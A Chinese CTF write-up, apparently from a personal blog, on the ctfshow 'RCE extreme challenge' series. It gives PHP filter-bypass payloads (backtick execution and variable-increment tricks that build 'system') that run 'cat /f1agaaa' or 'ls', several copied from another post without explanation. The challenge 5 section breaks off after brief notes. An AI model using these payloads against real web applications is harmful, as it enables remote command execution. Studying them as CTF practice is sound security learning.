RCE极限挑战
admin
2024-02-09 17:08:49
前言
当时做的时候就做了两题就溜了,现在回头看一下学到了不少知识。
RCE挑战1
只过滤了括号,没有过滤反引号。
code=echo `cat /f1agaaa`;
RCE挑战2
自增绕过,不过在构造 A 字母时不能用双引号了,可以用单引号连接,形成字符串,并获取字母 A。
并且版本是 php7,也就不能动态调用 eval 和 assert 了。
payload:
?_=system&__=cat /f1agaaa
ctf_show=%24_%3D%5B%5D%3B%24_%20%3D%20''.%24_%3B%24_%3D%24_%5B'!'%3D%3D'%3B'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D'_'.%24__.%24_%3B(%24%24__%5B'_'%5D)(%24%24__%5B'__'%5D)%3B
以下参考:
https://blog.csdn.net/m0_64815693/article/details/127951989
下面几题我就直接搬运 payload 不解释了,有兴趣的可以去上面的链接里研究,讲的很详细。
RCE挑战3
可用:
$ ( ) + , . / 0 1 ; = [ ] _
payload:
$_=([].[])[0];$_=($_/$_.$_)[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[1]);//执行这一串就可以了
ctf_show=%24_%3D%28%5B%5D.%5B%5D%29%5B0%5D%3B%24_%3D%28%24_/%24_.%24_%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B1%5D%29%3B&_=system&1=ls
RCE挑战4
可用:
$ ( ) + , . / 0 ; = [ ] _
$_=((0/0).[])[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[0]);//这样提交就可以了
ctf_show=%24_%3D%28%280/0%29.%5B%5D%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B0%5D%29%3B&_=system&0=ls
RCE挑战5
可用:
$ ( ) + , . / ; = [ ] _
这边主要是两个地方,一个是字符串链接和自增的执行的顺序,另一个是 gettext 扩展(支持 _())
官方:
练习两年半的篮球选手:
佚名大佬:
上一篇:Matlab:表相关的函数
相关内容
热门资讯
赤水性价比粮食酒推荐:2025...
赤水性价比粮食酒推荐:2025年酱香酒选购全攻略 一、开篇背景与市场痛点 2025年的赤水河流域酒类...
非白酒板块11月19日跌0.3...
证券之星消息,11月19日非白酒板块较上一交易日下跌0.33%,*ST椰岛领跌。当日上证指数报收于3...
以运河文化赋能产业发展|古贝春...
11月17日至19日,以“新质开新局,聚力创未来”为主题的2025年第六届中国白酒黄淮核心产区高质量...
深夜小酌的灵魂搭档:油炝脆骨,...
油炝脆骨是一道充满锅气与烟火气息的家常菜,以其爽脆的口感和浓郁的香辣风味深受许多人喜爱。这道菜的制作...
初中毕业新征程:为什么西点烘焙...
站在初中毕业的人生路口,许多女孩都在思考:哪条路能通往一个既美好又独立的未来?如果有一条道路,能将女...